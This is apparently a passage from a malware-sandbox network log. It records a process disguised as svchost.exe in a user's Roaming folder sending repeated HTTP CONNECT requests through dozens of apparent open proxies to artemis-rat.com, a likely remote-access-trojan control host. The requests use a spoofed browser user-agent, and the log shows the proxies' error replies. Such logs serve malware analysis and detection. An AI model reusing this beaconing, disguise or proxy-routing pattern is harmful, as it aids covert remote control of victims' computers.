                                                                                    2721192.168.2.558909192.154.244.92900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.496018887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2722192.168.2.558915172.67.181.978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.502851009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.667850971 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2723192.168.2.558929104.16.105.1068043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.510118961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.670737028 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2724192.168.2.558891107.180.90.88807843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.513753891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.145921946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.833856106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146292925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.646251917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2725192.168.2.558945172.67.182.968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.514484882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.671344042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2726192.168.2.55795145.11.95.165521943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.521794081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2727192.168.2.55801772.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.522517920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2728192.168.2.559008104.16.221.578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.569232941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.067831039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.229126930 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2729192.168.2.559010172.67.25.2048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.569569111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.145816088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.306216002 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2730192.168.2.55814892.204.134.385617743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.571233988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2731192.168.2.558973148.72.23.56483343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.580399990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.176825047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.816102982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.177535057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.761169910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2732192.168.2.55896894.131.64.945837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.590739012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.812289953 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2733192.168.2.55887146.35.9.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.596340895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2734192.168.2.55834050.63.12.332385943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.614052057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.442589045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2735192.168.2.558999129.213.150.2058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.615740061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2736192.168.2.558873203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.615977049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2737192.168.2.55886143.133.70.571567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.618120909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2738192.168.2.559048104.18.251.2088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.619604111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.774039984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2739192.168.2.558904121.164.200.18108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.621335030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2740192.168.2.558860120.78.191.688043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.630693913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.971091032 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
